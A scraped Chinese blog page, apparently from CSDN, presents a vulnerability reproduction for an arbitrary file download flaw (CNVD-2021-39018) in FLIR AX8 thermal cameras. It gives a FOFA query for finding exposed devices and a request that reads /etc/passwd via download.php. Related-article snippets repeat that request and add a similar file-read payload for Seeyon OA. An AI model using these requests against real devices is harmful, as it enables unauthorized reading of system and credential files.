FLIR-AX8 任意文件下载(CNVD-2021-39018)

最新推荐文章于 2024-08-15 09:23:50 发布
最新推荐文章于 2024-08-15 09:23:50 发布
阅读量3.2k 收藏
点赞数
分类专栏: POC 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BeWorthyOf/article/details/121401980
版权
本文详细介绍了FLIR-AX8红外热像仪存在的任意文件下载漏洞,该漏洞可能导致攻击者下载系统配置文件。影响版本为FLIR-AX8。通过FOFA查询和POC验证,可以确认漏洞的存在。
摘要由CSDN通过智能技术生成

漏洞描述:

FLIR-AXB是一款红外热像仪,是美国菲力尔公司(Teledyne FLIR)专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术。

漏洞影响:

FLIR-AX8存在任意文件下载漏洞。攻击者可利用漏洞下载相关系统配置文件。

影响版本

FLIR-AX8

漏洞复现

FOFA  app="FLIR-FLIR-AX8"

访问主页:

 /download.php?file=/etc/passwd</

最低0.47元/天 解锁文章
笑笑小菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】FLIR AX8红外线热成像仪命令执行漏洞
失心少年
12-08 651
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。我们的产品,紧急救援人员,军事人员保护,救生,高运营效率,以及创新型消费技术。Teledyne FLIR 为加强公共安全和福利、提供高能源和时间效率、为正常健康和智能社会做出贡献增添了力量。自透射热图像、可见光图像、可见频率分析、来自测量和诊断的先进威胁测量系统以及日常生活的创新解决方案。
Flir AX8手册中文-zh-cn.pdf
08-12
这个是Flir AX8 热成像的开发说明手册,最近在研究这个设备二次开发,分享给大家作为参考。
FLIR-AX8 任意文件下载
thelostworld
05-12 442
FLIR-AX8 任意文件下载一、漏洞描述FLIR-AX8 download.php存在任意文件下载漏洞,直接访问可下载相关系统配置文件。二、影响版本FLIR-AX8三、漏洞复现访问主页:详细数据包:GET /download.php?file=/etc/passwd HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5
FLIR-AX8 download.php 任意文件下载
qq_17754023的博客
11-05 746
FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞。
[0day]FLIR-FLIR-AX8某接口存在任意文件读取-大量存在
weixin_43167326的博客
03-14 476
FLIR-AX8是美国菲力尔公司(Teledyne FLIR)旗下的一款工业红外热像仪AX8,英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。
FLIR-ADAS-v2 数据集 BDWP下载链接 零积分
10-14
FLIR_ADAS_v2 数据集下载链接,内容为txt文件,打开后会显示百度网盘下载链接
FLIR-ADAS-v2 中 annotation转换后的xml文件 零积分
10-14
本文将深入探讨如何将FLIR ADAS v2数据集的原始标注文件转换为XML格式,以便适应那些依赖XML标注的深度学习模型。FLIR ADAS(Advanced Driver Assistance Systems)是一个专门针对自动驾驶和车辆安全研究的数据集,...
FLIR-pyqt5完整测试程序
02-28
FLIR-pyqt5完整测试程序】是一个基于Python、PyQt5框架的项目,用于在Windows 10操作系统上与FLIR热像仪进行交互。这个程序的主要目的是提供一个用户友好的界面,允许用户打开热像仪,调整相机的曝光设置,并能够...
FLIR公司的ADAS可见光-红外数据库,百度网盘链接
02-12
FLIR公司的ADAS可见光-红外数据库(共有5个文件总共15G左右),以及两个其他小数据集。FLIR的数据库用于无人驾驶汽车的辅助夜视系统深度学习模型训练。这是目前业内最齐全的数据集。
flir ip config.exe
08-28
这个是Flir红外设备的IP扫描工具,在同一局域网下,可以扫描出在此局域网的所有设备并且还有设备IP地址设置的功能
致远OA任意文件下载漏洞(CNVD-2020-62422)
1stPeak's Blog
06-15 6974
漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 payload 致远OA webmail.do文件读取漏洞, 由于 /seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。 通过修改filePath参数来下载服务器文件 /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.proper
致远OA webmail.do任意文件下载 CNVD-2020-62422
PeiQi的博客
01-25 5221
致远OA webmail.do任意文件下载 CNVD-2020-62422 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 漏洞影响 致远OA A6-V5 致远OA A8-V5 致远OA G6 漏洞复现 访问 url http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=…/conf/datasourceCtp.prope
Flir AX8 红外摄像机获取温度值
Duier~Duier~
12-27 820
Flir AX8 红外摄像机获取六个点温度以及框的最高最低温度 实现原理源码maven引入jar包modbus读取寄存器类 实现原理 该摄像机支持modbus Tcp 通讯 只需要通过Java的modbus驱动包将相机寄存器内的相应寄存器值获取到即可 其实还可以获取别的设备状态设备文档中有详细解释这里不做过多说明。 源码 maven引入jar包 modbus4j-3.0.5.jar下载【链接】 <!-- Modbus4j引入 --> <dependency&g
安全文件下载与上传之——下载原理与案例
温柔小薛的博客
04-06 223
下载原理与案例 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能, 但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件, 这就是文件查看与下载漏洞。 利用方式 一般链接形式 download.php?path= down.php?file= data.php?file= 或者包含参数 &Src= &Inp...
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 117
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
等保测评中的安全需求分析:构建精准的信息安全防护体系
最新发布
w13359990065的博客
08-15 470
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Future_2024的博客
08-13 554
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Scout Suite:开源云安全审计工具
网络研究观
08-12 281
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
Flir AX8热成像开发手册:必备操作指南
"Flir AX8手册中文版提供了对FLIR AX系列热成像设备的详尽开发指南。这份文档的重要性在于,它确保用户在操作前必须充分理解和遵守所有指示、警告、注意事项以及法律免责声明,以确保安全并充分利用设备的功能。手册...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值